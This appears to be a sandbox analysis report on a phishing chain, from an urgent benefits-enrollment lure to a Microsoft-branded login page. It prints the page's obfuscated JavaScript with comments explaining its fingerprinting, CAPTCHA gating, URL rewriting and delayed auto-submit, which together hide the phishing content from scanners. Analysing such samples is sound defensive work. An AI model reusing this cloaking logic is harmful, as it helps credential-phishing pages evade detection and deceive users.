URL: file:///C:/Users/user/Desktop/bad.html Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "If you fail to enroll this November, your current benefits will not roll over and you will have to wait until the next open enrollment period (November 2025).",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: file:///C:/Users/user/Desktop/bad.html Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "If you fail to enroll this November, your current benefits will not roll over and you will have to wait until the next open enrollment period (November 2025).",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: file:///C:/Users/user/Desktop/bad.html Model: Joe Sandbox AI | {
"brands": [
"Yogi Tea"
]
} |
|
URL: file:///C:/Users/user/Desktop/bad.html Model: Joe Sandbox AI | {
"brands": [
"Yogi Tea"
]
} |
|
URL: :// Model: Joe Sandbox AI |
{
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: :// |
URL: https://login.itpishro.com/vmiddle9999... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code. While some of the behaviors may be related to legitimate functionality, such as browser detection and CAPTCHA handling, the overall complexity and lack of transparency raise significant security concerns."
} |
// Rewrites the URL of the current history entry to "/" without reloading, so the
// path this page was loaded from (the report row lists it as /vmiddle9999...) is
// no longer what the address bar shows once the script has run.
history.replaceState({},"","/");
// String-table shuffle, in the shape typical of off-the-shelf JavaScript obfuscators.
// It takes the shared array returned by _0x83b1() and rotates it (shift + push)
// until the arithmetic check below equals the expected constant 0x37b68 (228200).
// Until this has run, _0x10f1(index) does not resolve to the intended strings.
(function (_0x2b8318, _0x263e16) {
// _0x41b7ab: alias for the lookup function; _0x1397c9: the shared string array.
var _0x41b7ab = _0x10f1, _0x1397c9 = _0x2b8318();
while (!![]) {
try {
// Checksum over parseInt() of nine table entries. If 'length' or 'toString' sits
// in one of the sampled slots, parseInt() yields NaN, the comparison fails and the
// array is rotated again. With the table shown on this page the check first passes
// after 10 rotations, leaving _0x10f1(0x1d3) === 'length' and
// _0x10f1(0x1d6) === 'toString'.
var _0x56aa45 = parseInt(_0x41b7ab(0x1d8)) / 0x1 + -parseInt(_0x41b7ab(0x1d1)) / 0x2 * (-parseInt(_0x41b7ab(0x1d4)) / 0x3) + parseInt(_0x41b7ab(0x1ce)) / 0x4 + -parseInt(_0x41b7ab(0x1d0)) / 0x5 + -parseInt(_0x41b7ab(0x1d2)) / 0x6 + parseInt(_0x41b7ab(0x1d5)) / 0x7 * (parseInt(_0x41b7ab(0x1cf)) / 0x8) + -parseInt(_0x41b7ab(0x1d7)) / 0x9;
if (_0x56aa45 === _0x263e16)
break;
else
_0x1397c9['push'](_0x1397c9['shift']());
} catch (_0x4bf6eb) {
// An exception during the check is treated like a mismatch: rotate and retry.
_0x1397c9['push'](_0x1397c9['shift']());
}
}
}(_0x83b1, 0x37b68));
/**
 * Hex-encodes a string: every UTF-16 code unit of the argument is converted with
 * charCodeAt(i).toString(16) and the results are concatenated with no separator.
 * The property names 'length' and 'toString' are not written literally; they are
 * fetched from the string table through _0x10f1(0x1d3) and _0x10f1(0x1d6).
 *
 * Note for decoding captured form values: the digits are not zero-padded, so a
 * code unit below 0x10 contributes one digit and one above 0xff contributes three
 * or four. Reading the output two digits at a time is therefore only reliable
 * when the input was printable ASCII.
 *
 * @param {string} _0x1c737b - text to encode.
 * @returns {string} concatenated lowercase hex digits.
 */
function _0x74739(_0x1c737b) {
var _0xe2ac07 = _0x10f1, _0x41fa4e = '';
// Loop bound is _0x1c737b['length'], looked up indirectly.
for (var _0x859b98 = 0x0; _0x859b98 < _0x1c737b[_0xe2ac07(0x1d3)]; _0x859b98++) {
// Equivalent to: out += s.charCodeAt(i).toString(16)
_0x41fa4e += '' + _0x1c737b['charCodeAt'](_0x859b98)[_0xe2ac07(0x1d6)](0x10);
}
return _0x41fa4e;
}
/**
 * String-table lookup used by the obfuscated code.
 * On the first call it fetches the shared array from _0x83b1() once, then
 * replaces itself (reassigns the name _0x10f1) with a closure over that array
 * and forwards the original arguments to it. The closure subtracts the base
 * offset 0x1ce from the requested index and returns that array element.
 * The second parameter is accepted but never read in the code shown.
 *
 * @param {number} _0x1774c9 - table index, offset by 0x1ce.
 * @param {*} _0x33db3a - unused.
 * @returns {string} the table entry at (_0x1774c9 - 0x1ce).
 */
function _0x10f1(_0x1774c9, _0x33db3a) {
var _0x83b16f = _0x83b1();
return _0x10f1 = function (_0x10f12d, _0x1f2413) {
// Indices in the script start at 0x1ce; normalise to a zero-based array index.
_0x10f12d = _0x10f12d - 0x1ce;
var _0x2cd561 = _0x83b16f[_0x10f12d];
return _0x2cd561;
}, _0x10f1(_0x1774c9, _0x33db3a);
}
/**
 * Returns the obfuscator's string table.
 * The first call builds the array, then reassigns _0x83b1 to a function that
 * returns that same array object, so every caller shares one instance. That
 * sharing is what lets the rotation loop at the top of the script change what
 * later _0x10f1() lookups return.
 *
 * In the code shown, only 'length' and 'toString' are used as real property
 * names; the digit-prefixed entries are read through parseInt() by the rotation
 * check and appear to serve only as its checksum material.
 *
 * @returns {string[]} the shared (mutable) string table.
 */
function _0x83b1() {
var _0x868a6c = [
'10344HVpkDN',
'1802055NkIvet',
'107612iBMkFH',
'1466220eCvEHF',
'length',
'18umtuTH',
'987DihKGv',
'toString',
'4036734cyjByR',
'360792nEGbWg',
'1662264AFuwvD'
];
// Self-replacement: subsequent calls skip the literal and hand back the same array.
_0x83b1 = function () {
return _0x868a6c;
};
return _0x83b1();
}
// Client fingerprint: parses the User-Agent with `bowser` (presumably the Bowser
// UA-parsing library, loaded elsewhere on the page; confirm) and writes the
// hex-encoded browser name and platform type into the form fields bValue and pValue.
var result = bowser.getParser(window.navigator.userAgent);
document.getElementById("bValue").value = _0x74739(result.parsedResult.browser.name)
document.getElementById("pValue").value = _0x74739(result.parsedResult.platform.type)
// First bot check: requests a Google reCAPTCHA token for the action
// 'validate_captcha' and stores it, hex-encoded, in the g-recaptcha-response field.
// The site key below is a page-specific indicator that can be searched for in
// other captures.
grecaptcha.ready(function() {
// do request for recaptcha token
// response is promise with passed token
grecaptcha.execute('6LfRF5kqAAAAAAuW2dANii_JwRF95-vsYuOAqHr0', {action:'validate_captcha'})
.then(function(token) {
// add token value to form
document.getElementById('g-recaptcha-response').value = _0x74739(token);
});
});
// Second bot check: Cloudflare Turnstile rendered into #igp. When the widget
// reports success, its token is hex-encoded into the cCapt field and the form
// subAct is submitted automatically after 5000 ms, with no click required.
// Whatever the server returns for that POST is therefore only reachable by a
// client that passed the challenge; a fetch of this page alone will not show it.
window.onloadTurnstileCallback = function () {
turnstile.render('#igp', {
sitekey: '0x4AAAAAAA1_-36g8D2Tj7IT',
callback: function(token) {
document.getElementById('cCapt').value = _0x74739(token);
setTimeout(() => {
document.getElementById("subAct").submit();
},5000);
},
});
};
// Disabled in the captured sample: an unconditional submit that would bypass the
// Turnstile callback above.
//document.getElementById("subAct").submit();
|
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script sets up various configuration options for the Cloudflare challenge and includes some communication with the parent window. While it uses some dynamic code execution techniques, such as `postMessage()`, the overall behavior seems to be within the expected scope of a legitimate Cloudflare challenge implementation. Therefore, the risk score is assessed as low, as the script is likely serving a legitimate security purpose."
} |
// Inline bootstrap captured from the Cloudflare challenge frame (the report row
// gives its origin as challenges.cloudflare.com). It publishes the per-widget
// configuration on window._cf_chl_opt and registers a message listener used to
// talk to the embedding page.
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'clr6f',
// Same site key that the login.itpishro.com script on this page passes to
// turnstile.render(), which ties this widget instance to that page.
chlApiSitekey: '0x4AAAAAAA1_-36g8D2Tj7IT',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'dMN7WPMEilCThpKwN1ZLnKgfhwwlJTKBI24xz0Y1S2w-1734379902-1.3.1.1-QTizu6SqBHyr3J8fisEiOU1HssjNb7FRVANhV1U8POA',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8f3152f6ae848c9c',
cH: '4ixbLmqEBL.yWhCKH7kuZNUuCOQgR_WvZF1cwuZROWI-1734379902-1.1.1.1-gp5.HGiiAtH5IBI9Vd8MFZ.KWLXHWDfDj5u9XG9ViDp9TIBSGN3H5bT9THGAmYCC',
cFPWv: 'g',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: '98UWXCGHJd.0VVbOS.wJEmzr7IPVRoTp8c99K5_Y_L0-1734379902-1.1.1.1-qVOb56vudH4axfwchw5y73ZOOovh66H7b4k93VK.SvyWZD9WSIFKaks2ce_WL3hkE1gA8dZXDKof6LgYrrN2UUlXvmp9SU.XJLMNDGAwzkb_aFxQjfI9Sy4sgOYNb8HdG72O6CICRADFs9qABpJONDti7LoBlr6yEYUN5PkForAk3qoLt6UwXaN.IBoFcJ1AdxWTXgbfUekmmRg1YOJ5rZNvh8qAW_qSVeaK4sOXgenn1bNNTM3FGvxU7I5txiGWfPosRngYhA.mfx9pAt5H.yFI3ig2CPvqTMjbbYABmI5xs6HmtUz81AWor2XUjNZlpdiJDYL3qx1LG5lYQpYaHpKl2vkUcEfw1ZQ1uDw_ddEBPmij5qEPC1EQESf3yZmYT.80CLTpgWakle4sWBhHVrYLxvBa8p9GyPkdjrAMTCih3kcjeJ9q3tu.MJsjB7OoaRQnhH5XVm.vgJ9P6mL8ZU5mlN0U3WWxFiNVVVcev0lnWVHQOE11K2GSmOXFmnbrR6zfAfJgmNJE7nPwqg_oLZG32QyPhw6_HDOW93GeCCbEISDiA9kSUafaNOQIGTL7kahlo8PL7owBEFT.1PVaD87FziIK7NSb9HaLmPb6QWIugXrAuShlJGLy1.LxRpvFFhSjByOjhy39.fiLwW3s0mW31k94bYzmB4Hm6UJd8L30SlricnAu_ukmQXAhE4C7E_SY9Mo4Wf0V5fhEpPc1U3buOIVsM3QeUcJOCfWtnDhYRFtNl.aJeavcmpJBCe.O9tc0oVBGmFU79cUlhKIXeJjP.htoe7904TNJ6PwABrheC.wmvCF1R7gFnaEFCOwy7_SeoDUVyQSoXE1H7MV_oMg9qFqEsnyOjWGIoWKPKv4d0vmpwCzN9S_uOxnmfJjDB0E5FRuHdD3qCDO0OdRi1rgkuP68io_JLlzdsoyd9X3nQKB1hXWmQx_CQ9gFFNUVNpKhCtXFhiiJQV5DF9zwnhOia9OUKNiA0k74XEPeZ4EpWy0ixqmww1hXsxzli2ZntvjmEws8rWKaBDu2XmfiR215ZPwYSZow0JuyzQPUctGteimnd0fXngjDuMNFHN.s_5ymDZnGpRybFHSkP7ARZ8SCWZBpfHUsI.GaQxxNdG.Byi2htnLsHzkn2Uuz6kX8DiYPBibM10rYs3HyxfR9eiunwE2r6J0D89lM9lVum0uLLKkh42s.UwozBcWPCV.XbT5X_b05zVnoKGZp9Qn9DRLXgH2ggNKoe7.GdTsKCuTVoZsJU1dvbv9pgB9kt7BR5ZU5d4zRJCwQ6NmvMmB5d_gm7jx6nQxwrHUM0b_yPRZMcRGXrwexLmNModRMUC6nF01E0YGToAOXjSmShv1TKUkI1M908n3bk2SlAPdQmTRUhhJee6ToVUZkett1L3Mg.prW6iPUrp7TvYa9Fg4kZw',
// NOTE(review): looks like a Unix epoch-seconds value; the same number is embedded
// in chlApiRcV, cH and md above. Confirm before using it as the capture time.
cITimeS: '1734379902',
// Asks the embedding page to reload the widget. The message is posted with target
// origin "*", so whichever page embeds this frame receives widgetId and nextRcV.
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'clr6f',
nextRcV: 'dMN7WPMEilCThpKwN1ZLnKgfhwwlJTKBI24xz0Y1S2w-1734379902-1.3.1.1-QTizu6SqBHyr3J8fisEiOU1HssjNb7FRVANhV1U8POA',
event: 'reloadRequest',
}, "*");
}
}
};
// Liveness handshake: a 'meow' message carrying this widget's id is answered with
// 'food', echoing the sender's seq. The handler filters only on fields of
// event.data; it does not look at event.origin, and the reply again uses "*".
// NOTE(review): `e.source` is read before any type check, so a message whose data
// is null or undefined would throw inside this handler.
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
URL: https://challenges.cloudflare.com/turnstile/v0/g/f... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. While it does not contain any clear indicators of malicious intent, the use of dynamic code execution, external data transmission, and aggressive DOM manipulation warrant further review. Additionally, the presence of obfuscated code and the use of multiple fallback domains increase the overall risk profile of the script. Overall, this script requires closer inspection to determine its true purpose and potential impact on user security and privacy."
} |
"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Sr(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function jt(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function zt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return 
o}function Gt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Xt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. 
Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: https://login.itpishro.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://login.itpishro.com |
URL: https://login.itpishro.com/ Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This script appears to be related to Cloudflare's Turnstile challenge, which is a legitimate security mechanism used to verify users. The script contains translations and configuration options for the Turnstile challenge, which is a common practice for websites that use Cloudflare's services. There are no clear indicators of malicious behavior, and the script seems to be serving a legitimate purpose."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.xEJX4={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"turnstile_refresh":"Refresh","testing_only":"Testing%20only.","turnstile_timeout":"Timed%20out","turnstile_overrun_description":"Stuck%20here%3F","turnstile_feedback_report":"Having%20trouble%3F","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_failure":"Error","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_footer_terms":"Terms","turnstile_feedback_description":"Send%20Feedback","turnstile_success":"Success%21","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_expired":"Expired","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","human_button_text":"Verify%20you%20are%20human","turnstile_footer_privacy":"Privacy","turnstile_verifying":"Verifying...","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%
3EClick%20here%20for%20more%20information%3C%2Fa%3E","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eR,eU,eV,fl,fm,fq,fr,fs,fz,fF,fI,fK,fL,fM,fY,ga,gg,gh,gi,gs,gD,gH,eS,eT){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(938))/1+parseInt(gI(1242))/2+parseInt(gI(905))/3+-parseInt(gI(550))/4*(-parseInt(gI(1160))/5)+-parseInt(gI(617))/6+parseInt(gI(1831))/7+-parseInt(gI(965))/8,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,162404),eM=this||self,eN=eM[gJ(1337)],eM[gJ(1026)]=function(c,gU,e){e=(gU=gJ,{'CUvVM':function(g,h){return g(h)}});try{return eQ(c)}catch(g){return e[gU(1621)](eO,eP(c))}},eR=function(gV,d,e,f,g){return gV=gJ,d={'STJDv':function(h,i){return h<i},'OpdLT':gV(1069),'DZpTH':gV(1187),'qWkfa':function(h,i){return h(i)},'ehWeG':function(h,i){return h|i},'tdBji':function(h,i){return i&h},'DyGtl':function(h,i){return h(i)},'IsfGg':function(h,i){return i|h},'mNoXV':function(h,i){return i==h},'kxupn':function(h,i){return h(i)},'yCEQi':function(h,i){return h<<i},'lDFru':function(h,i){return h<i},'RspxZ':function(h,i){return h(i)},'SgIhO':function(h,i){return h!==i},'PfAcu':function(h,i){return h>i},'Mqjuo':function(h,i){return h<i},'AOXau':function(h,i){return h(i)},'pdlde':function(h,i){return h>i},'RavbC':function(h,i){return h|i},'AmEiV':function(h,i){return h==i},'PTOqa':function(h,i){return h-i},'fswZZ':function(h,i){return h(i)},'npwoa':gV(1875),'ctWVY':function(h,i){return h|i},'YoIfi':function(h,i){return h|i},'XgkPr':function(h,i){return h<<i},'GfTyF':function(h,i){return h(i)},'VOVpD':function(h,i){return i==h},'UFNPm':function(h,i){return h(i)},'jGRuX':function(h,i){return 
h<<i},'ZhlCh':gV(855),'uGLRM':gV(1092),'TmUce':gV(1717),'aNkhT':function(h,i){re |
URL: https://www.gstatic.com/recaptcha/releases/pPK749s... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet appears to be a legitimate Google reCAPTCHA implementation, with no obvious malicious behaviors. It includes code related to analytics, telemetry, and DOM manipulation, but these are common practices for a reCAPTCHA widget. The code is also well-commented and licensed under the Apache 2.0 and MIT licenses, indicating it is likely part of a legitimate open-source project. Overall, this script poses a low risk and is likely used for its intended purpose of providing a reCAPTCHA challenge."
} |
(function(){/*
Copyright The Closure Library Authors.
SPDX-License-Identifier: Apache-2.0
*/
/*
Copyright Google LLC
SPDX-License-Identifier: Apache-2.0
*/
/*
Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.
Copyright The Closure Library Authors.
SPDX-License-Identifier: MIT
*/
/*
Copyright The Closure Library Authors.
SPDX-License-Identifier: Apache-2.0
*/
var T=function(){return[function(r,d,h,V,R,K,Y,S,N,D,F,E,l,B,C,m){return(r|32)==(((C=["fr","flat",2],r)-C[2]>>4||(m=new Promise(function(P){window.addEventListener("visibilitychange",P,{once:!0}),document.hidden||P()})),r-7>>4)||(E=[2654435761,0,"1"],Y.wb=K===void 0?!1:K,B=b[38](26,Y,V),N=g[16](55,B),Y[C[0]]=N.next().value,Y.C=N.next().value,Y.rI=N.next().value,Y.Zf=N.next().value,F=Y.R()[C[1]](Infinity),S=F.findIndex(function(P){return P instanceof dy&&k[17](15,P,h)==d}),l=g[9](5,F[S],lj,3,p[12](77)),
D=[n[48](22,Y[C[0]]),A[43](38,Y.rI,U[9](11,Y[C[0]]),E[0]),A[10](27,3,Y.rI,U[9](19,Y.rI),E[1]),A[10](28,3,Y.Zf,U[9](19,R),Y.bf),A[10](24,3,Y.Zf,U[9](35,Y.Zf),U[9](27,Y.rI)),T[11](20,T[26](64,h,l[h])),k[30](55,h,E[C[2]],F,Y,Y.Xa)],U[47](20,E[1],Y),m=D),r)&&(K=g[31](9,1,d,V+R,gy),Y=h.map(function(P,v){return K[v%K.length]}),m=p[30](28,0,Y,h)),m},function(r,d,h,V,R,K,Y,S,N){if(N=[75,"userAgent",46],(r&N[0])==r){a:{if(V=By.navigator)if(h=V[N[1]]){d=h;break a}d=""}S=d}if((r>>1&14)==((r|24)==r&&(p[48](18,
h.B),h.F=d),r-5&13||(V=e[48](10,d,h),S=V=="array"||V==d&&typeof h.length=="number"),2))a:{if(n[32](N[2])&&V!=="Silk"){if(!(Y=kG.brands.find(function(D){return D.brand===V}),Y)||!Y.version){S=NaN;break a}K=Y.version.split(".")}else{if((R=U[28](1,"OPR",h,d,"8.0",V),R)===""){S=NaN;break a}K=R.split(".")}S=K.length===0?NaN:Number(K[0])}return(r>>2&3)==3&&(Y=b[15](45,V,pZ(),h),S=function(D,F){return D=b[F=["concat",1,"reduce"],29](F[1],F[1],0,255,d+Y(),K),{rm:k[26](10,0,R[F[0]](D).map(function(E){return A[14](9,
0,E)})[F[2]](function(E,l){return E.xor(l)})),A0:D}}),S},function(r,d,h,V){return(r^25)<((r|(V=[37,28,27],5))>>4||(d=T[9](26,this.U),h=U[45](2,!1,V[1],this.U,d,!1)),V[0])&&r+4>=V[2]&&H.call(this,d),h},function(r,d,h,V,R,K){return(r+(R=[1,24,29],(r-2|7)<r&&(r-R[0]|55)>=r&&(K=sM(function(){return h().parent!=h()?!0:h().frameElement!=null?!0:!1},!0)),2)&R[2])>=r&&(r+5^28)<r&&(K=CZ(ij(d,h),V)),(r|32)==r&&H.call(this,d),(r|R[1])==r&&(K=function(Y,S,N,D,F,E,l,B,C){C=[5,"aO","push"],UM.length?(E=UM.pop(),
g[C[0]](4,E,S),e[8](63,void 0,S,void 0,Y,E.U),D=E):D=new vy(Y,S),F=D;try{l=new V,N=l[C[1]],p[18](25,null,h)(N,F),B=l}finally{F.U.clear(),F.J=-1,F.R=-1,UM.length<d&&UM[C[2]](F)}return B}),K},function(r,d,h,V,R,K,Y,S){if((S=["call",32,47],(r|1)&2)==2){K=["/m/04w67_",'<div class="',"TileSelectionStreetSign"],R=K[1]+p[40](S[2],"rc-imageselect-desc-no-canonical")+h;switch(A[18](56,V)?V.toString():V){case K[2]:R+="Tap the center of the <strong>street signs</strong>";break;case "/m/0k4j":R+="Tap the center of the <strong>cars</strong>";
break;case K[0]:R+="Tap the center of the <strong>mail boxes</strong>"}Y=$G(R+d)}if((r^30)>=20&&(r^25)<S[1])H[S[0]](this,d,0,"dresp");if((r|48)==r)H[S[0]](this,d);return Y},function(r,d,h,V,R,K,Y){if((r+5&7)==(((K=[1,2,"call"],r^7)&12)<5&&(r^32)>>4>=K[1]&&(Hy[K[2]](this,d),this.U=[[]],this.C=K[0]),K)[1]){R=[7,0,127],Wy(V);for(Wy(h);h>R[K[0]]||V>R[K[1]];)d.U.push(V&R[K[1]]|128),V=(V>>>R[0]|h<<25)>>>R[K[0]],h>>>=R[0];d.U.push(V)}if((r>>K[0]&11)==K[0])MB[K[2]](this,360,20);return Y},function(r,d,h,V,
R,K,Y,S,N){return((r|((r&46)==(r+5<(N=["J","U","hN"],23)&&(r^37)>=8&&(p[19](44,V),h=e[10](50,V,h),V[N[1]].has(h)&&(V.K=d,V[N[0]]-=V[N[1]].get(h).length,V[N[1]]["delete"](h))),r)&&(K=["n","waf",!0],R.B=Date.now(),X$=R.yM,R[N[0]]=U[32](32,R[N[1]])?new yx(R.yM,R.O,n[6](50,z1,R[N[1]])):new a9(R.yM,R.O),R[N[0]].R=A[27](4,9,R[N[2]]),p[41](2)?R[N[0]].u(n[9](83,"t",K[2],R),n[5](37,"-",R.id),!1):(R.K=p[19](76,0,K[2],V,R),V===1&&window.___grecaptcha_cfg[K[1]]&&window.___grecaptcha_cfg[K[1]].includes("session")&&
U[32](41,R[N[1]])&&e[34](41,5,K[0],R),U[32](33,R[ |
URL: https://www.google.com/js/bg/FsaNIYyPN76i0sL7d3myI... Model: Joe Sandbox AI | {
"risk_score": 3,
